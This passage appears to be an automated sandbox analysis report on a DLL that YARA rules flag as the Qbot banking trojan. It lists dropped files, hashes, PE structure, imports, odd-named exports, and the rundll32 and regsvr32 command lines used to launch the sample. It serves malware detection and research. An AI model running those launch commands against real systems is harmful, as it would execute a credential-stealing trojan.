          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.7.5.0.5.0.7.1.8.4.9.3.9.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.7.5.0.5.0.9.1.3.9.6.2.2.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.c.4.b.2.4.c.-.2.a.1.a.-.4.5.c.a.-.9.6.6.9.-.2.8.1.4.1.3.2.c.a.5.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.3.4.b.9.9.b.-.2.7.8.4.-.4.8.4.a.-.a.8.3.3.-.b.a.e.4.5.b.f.a.a.2.7.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.9.8.-.0.0.0.1.-.0.0.1.f.-.3.6.6.8.-.b.5.a.9.0.d.c.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9462.tmp.dmp

          Download File
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Mini DuMP crash report, 14 streams, Tue Sep 13 01:11:23 2022, 0x1205a4 type
          Category:dropped
          Size (bytes):43598
          Entropy (8bit):2.178603719938501
          Encrypted:false
          SSDEEP:192:MnQCBwBHVO5Skbq9t/SxnLB3WjCOeMa5x6e/7Ux6NGnih:ZPW5Lbq9BeMPa5xki
          MD5:CF87A5ADF6D2F24280FFF66D0983984C
          SHA1:90B3F04C1CBFD6BF73D2F19A2D49973E427C18FE
          SHA-256:CF44CE8577786FA78868678674EC74BA72186360EF384F9CC7CB5F7962644650
          SHA-512:DBAABE55E0605BC4E7F7F8C2B2D906AA94E96E0470E9932AF75607E792B2A723FCC56F1617C0A85DF0A45E00CF90DBE20F5C00E537A407F0FDCF48937D390F13
          Malicious:false
          Preview:MDMP....... ..........c.........................................,..........T.......8...........T...........@...............0................................................................................U...........B..............GenuineIntelW...........T..............c.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERD15C.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
          Category:dropped
          Size (bytes):8250
          Entropy (8bit):3.693098122962451
          Encrypted:false
          SSDEEP:192:Rrl7r3GLNiEU616Y666LxgmfTbSUCpro89bQ7sfo0vQm:RrlsNi/616Yf6LxgmfTbSpQAfr
          MD5:8A4783D6E4341DA5FC5069EE5E66B975
          SHA1:DEE8A897083E614065F6EDC4B45353DB08DCE1F2
          SHA-256:2209B7923082592B96951D4092C7897AC3D45A3DE7B438B0428907A047B4FA68
          SHA-512:525ECCF2CE5281CA571551937454F5FFC8FB466996CC9F35F86CDF3C2CFA2C17EE84C828C06687764463BA651E4AB2002DA9C2D1599B16212F312557DA652000
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.7.6.<./.P.i.d.>.......

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6CC.tmp.xml

          Download File
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4618
          Entropy (8bit):4.454296337798293
          Encrypted:false
          SSDEEP:48:cvIwSD8zsNJgtWI9wrwhWgc8sqYjJ98fm8M4JCdsrF++q8/HM4SrSBd:uITfnrXgrsqYoJeBDWBd
          MD5:5B06A9516BDD150AAFD95A9B01B05069
          SHA1:9E579BFECA05C87DB79FA8FA4C66A61A499D6110
          SHA-256:2A045FFADD01FBA604DE84152EBD5837DC3678A162B8B5FC6D93B3F9969AC5F4
          SHA-512:61B352A10963A8285B54E8E7042A70370E8D9F5ABE960BF2CAD2DD916B29EAFC99E85930B70999548098C6DF17B5ECC60525DAE452A32241701D18398068542E
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1689742" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

          C:\Users\user\Desktop\_Rsr.dll

          Download File
          Process:C:\Windows\SysWOW64\explorer.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):4.579865793152575
          Encrypted:false
          SSDEEP:96:0yHlJtTt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD:0StMkXIKPD
          MD5:243AC7C1B33AD3E2D7445193FED65FFB
          SHA1:DC32AC331EE34B49050CFC52A0F8958DEF261784
          SHA-256:CB8E0ABE33970700BF675C874981DD028BD6AE71E8AB12F5570A50CEA9FAA462
          SHA-512:95AD65CB7F57CA7B286E1775FE4940FBA2AB67432EC191482A6ABC2950ACE8E3CE510BCFAF34AD19CAC4DE39F09B17F2092725C0B8FE283F66756BFB7E0AE054
          Malicious:true
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........eo.@...@...@.......L...............]...{Z..Q...{Z..U...{Z..P.......C...@..."....Z..B....Z..A....Z..A....Z..A...Rich@...........PE..L....G.c...........!.........@..............................................0............@.....................................(................................................................... ...@...............<............................text...X........................... ..`.rdata...A.......B..................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.266546172645788
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
          • Generic Win/DOS Executable (2004/3) 0.20%
          • DOS Executable Generic (2002/1) 0.20%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:_Rsr.dll
          File size:409575
          MD5:416a95274ef9248e08d88d5e2abe6971
          SHA1:03ac095d3a7bedad7b5c4aa1ea02c77be9fa86cb
          SHA256:fce49100872fb07dea83d417a95574304dcfdfc835034739af1a50a752b8594a
          SHA512:849efaca1e00e21fb1201265cf88243f6ab6f11b887bacf395ea115ba2a5d5da26fe6efe48ba6bf0534c45e5306ea844f166bab79bb4c4597a5870a36e5f481c
          SSDEEP:12288:Iszlp6XPvegFvr1rOl7OwLT7H5DOrC/Wg2t5rJgq:Iszlp0Pv/vr8xff1DOGb2t5iq
          TLSH:B594BF93E4489DBFD87906B825EE9F9B02C9FE10044CFC35F185264EDF1D322662A75A
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........eo.@...@...@.......L...............]...{Z..Q...{Z..U...{Z..P.......C...@..."....Z..B....Z..A....Z..A....Z..A...Rich@..........

          File Icon

          Icon Hash:74f0e4ecccdce0e4

          Static PE Info

          General

          Entrypoint:0x100083d8
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x10000000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          DLL Characteristics:DYNAMIC_BASE
          Time Stamp:0x631F47E7 [Mon Sep 12 14:53:27 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:a9d5a9467068a950aca10d226cf265df

          Entrypoint Preview

          Instruction
          push ebp
          mov ebp, esp
          cmp dword ptr [ebp+0Ch], 01h
          jne 00007F803866B9B7h
          call 00007F803866BCFAh
          push dword ptr [ebp+10h]
          push dword ptr [ebp+0Ch]
          push dword ptr [ebp+08h]
          call 00007F803866B873h
          add esp, 0Ch
          pop ebp
          retn 000Ch
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          push esi
          mov ecx, dword ptr [eax+3Ch]
          add ecx, eax
          movzx eax, word ptr [ecx+14h]
          lea edx, dword ptr [ecx+18h]
          add edx, eax
          movzx eax, word ptr [ecx+06h]
          imul esi, eax, 28h
          add esi, edx
          cmp edx, esi
          je 00007F803866B9CBh
          mov ecx, dword ptr [ebp+0Ch]
          cmp ecx, dword ptr [edx+0Ch]
          jc 00007F803866B9BCh
          mov eax, dword ptr [edx+08h]
          add eax, dword ptr [edx+0Ch]
          cmp ecx, eax
          jc 00007F803866B9BEh
          add edx, 28h
          cmp edx, esi
          jne 00007F803866B99Ch
          xor eax, eax
          pop esi
          pop ebp
          ret
          mov eax, edx
          jmp 00007F803866B9ABh
          call 00007F803866C0FAh
          test eax, eax
          jne 00007F803866B9B5h
          xor al, al
          ret
          mov eax, dword ptr fs:[00000018h]
          push esi
          mov esi, 1005D5F0h
          mov edx, dword ptr [eax+04h]
          jmp 00007F803866B9B6h
          cmp edx, eax
          je 00007F803866B9C2h
          xor eax, eax
          mov ecx, edx
          lock cmpxchg dword ptr [esi], ecx
          test eax, eax
          jne 00007F803866B9A2h
          xor al, al
          pop esi
          ret
          mov al, 01h
          pop esi
          ret
          call 00007F803866C0C5h
          test eax, eax
          je 00007F803866B9B9h
          call 00007F803866BF1Eh
          jmp 00007F803866B9CAh
          call 00007F803866C0B1h
          push eax
          call 00007F803866DF63h
          pop ecx
          test eax, eax
          je 00007F803866B9B5h
          xor al, al
          ret
          call 00007F803866E393h
          mov al, 01h
          ret

          Rich Headers

          Programming Language:
          • [C++] VS2015 UPD3.1 build 24215
          • [EXP] VS2015 UPD3.1 build 24215
          • [RES] VS2015 UPD3 build 24213
          • [LNK] VS2015 UPD3.1 build 24215

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x3e9d00xb4.rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT0x3ea840x28.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1e0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x610000x1800.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x3dc000x1c.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3dc200x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x13c.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x197580x19800False0.6238893995098039data6.670510713034416IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x1b0000x241960x24200False0.5961897166955017data5.294383525365631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x400000x1e0140x1d600False0.5799368351063829data4.485632219577427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .gfids0x5f0000xa40x200False0.27734375data1.453370752371076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x600000x1e00x200False0.52734375data4.708553337303423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x610000x18000x1800False0.8302408854166666data6.704808054706065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_MANIFEST0x600600x17dXML 1.0 document textEnglishUnited States

          Imports

          DLLImport
          KERNEL32.dllCreateFileA, SetEndOfFile, SetFilePointer, CloseHandle, GetLastError, HeapAlloc, HeapFree, GetProcessHeap, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, ExitProcess, CreateThread, OpenThread, ResumeThread, VirtualAlloc, GetProcAddress, LoadLibraryA, CreateActCtxA, ActivateActCtx, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, InterlockedFlushSList, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, GetFileAttributesExW, CompareStringW, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, DecodePointer, RaiseException, CreateFileW, WriteFile, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW

          Exports

          NameOrdinalAddress
          DllRegisterServer10x10014181
          GDyZ20x1001613d
          GHQvB58h2E30x1000164f
          LGv5I40x1001a556
          Mqae01id50x1001450e
          SNifCw242OCD60x10015588

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          No network behavior found

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:18:10:45
          Start date:12/09/2022
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\_Rsr.dll"
          Imagebase:0x2e0000
          File size:116736 bytes
          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:1
          Start time:18:10:46
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Imagebase:0xb0000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:2
          Start time:18:10:46
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline:regsvr32.exe /s C:\Users\user\Desktop\_Rsr.dll
          Imagebase:0x150000
          File size:20992 bytes
          MD5 hash:426E7499F6A7346F0410DEAD0805586B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:3
          Start time:18:10:46
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Imagebase:0x820000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:4
          Start time:18:10:46
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\_Rsr.dll,DllRegisterServer
          Imagebase:0x820000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:5
          Start time:18:10:51
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GDyZ
          Imagebase:0x820000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:7
          Start time:18:10:56
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GHQvB58h2E
          Imagebase:0x820000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:9
          Start time:18:11:04
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\WerFault.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Imagebase:0xd30000
          File size:434592 bytes
          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:12
          Start time:18:11:25
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\WerFault.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Imagebase:0xd30000
          File size:434592 bytes
          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:18
          Start time:18:11:49
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x20000
          File size:3611360 bytes
          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:19
          Start time:18:11:49
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x20000
          File size:3611360 bytes
          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:20
          Start time:18:11:49
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x20000
          File size:3611360 bytes
